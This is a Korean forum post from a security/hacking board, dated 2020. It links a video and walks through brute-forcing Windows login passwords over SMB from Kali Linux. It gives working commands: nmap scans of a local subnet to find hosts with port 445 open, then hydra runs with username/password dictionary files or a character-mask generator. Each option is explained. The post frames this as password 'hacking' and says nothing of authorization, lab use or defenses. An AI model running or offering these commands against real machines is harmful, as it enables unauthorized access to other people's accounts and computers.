설치 / 사용기
보안 / 해킹 윈도우 비밀번호 해킹 영상
2020.02.16 00:10
https://www.youtube.com/watch?v=b8MlG2EyOz0
안녕 하세요. gooddew 입니다.
윈도우 로그인 비밀번호 해킹 동영상을 만들었습니다.
사용한 운영제체는 KALI 입니다
이 방법은 리눅스에서 hydra 라는 프로그램으로 윈도우가 설치된 pc 에 네트워크로 접근해서 아이디 비번을 무작위 대입해서 찾아내는 방식입니다.
(1) 자신의 IP 확인
# ifconfig
(2) 공격 대상 IP 를 찾음
# nmap -sS 192.168.0.0/24
또는
# nmap -sV 192.168.0.0/24 (열려 있는 포트의 서비스와 버전정보를 보여줌)
445 포트가 열린 PC 를 찾아야 됨
(3) 아이디와 비밀번호 사전파일을 만들거나 인터넷에서 다운을 받음
(4) 무차별 대입으로 비밀번호을 알아냄
보통 두가지 방법이 있음
☞ 방법1 : 아이디 비번 사전 파일을 만들어서 무차별 대입하기
# hydra -L [아이디 사전파일] -P [패스워드 사전파일] [공격대상I IP] smb -V -f
# hydra -L user.txt -P pass.txt 192.168.0.125 smb -V -f
옵션 -f 는 아이디와 비밀번호는 최초 1회 찾으면 작업을 중단함
☞ 방법2 : 아이디를 미리 알고 있을 경우 옵션을 이용해서 비밀번호만 무차별 대입하기
# hydra -l 아이디 -x 숫자1:숫자2:a(A1!) 공격IP smb -V -f
옵션을 설명하면
슷자1은 최소자리수. 숫자2는 최대 자리수. a는 소문자 대표로 a~z 전체를 의미함. A 는 대문자 대표로 대문자 전체, 1은 0~9 를 의미함
특수문자는 각각 입력해야 됨
예시 1:5:a1 → 한자리 부터 5자리 까지 소문자와 숫자를 조합해서 무차별 대입
6:6:1$ → 6자리로만 숫자와 특수문자$ 을 조합해서 무차별 대입
4:5:A1 → 4자리부터 해서 5자리까지 대문자와 숫자를 조합해서 무차별 대입함
# hydra -l user -x 4:4:a 192.168.0.125 smb -V -f
추가 옵션 설명 : 대문자 L 과 P 는 사전파일이 필요한 옵션이고 소문자 l 은 실제 아이디 이고 -x 는 비밀번호를 조합해서 사용함
수고 많으십니다. 감사합니다.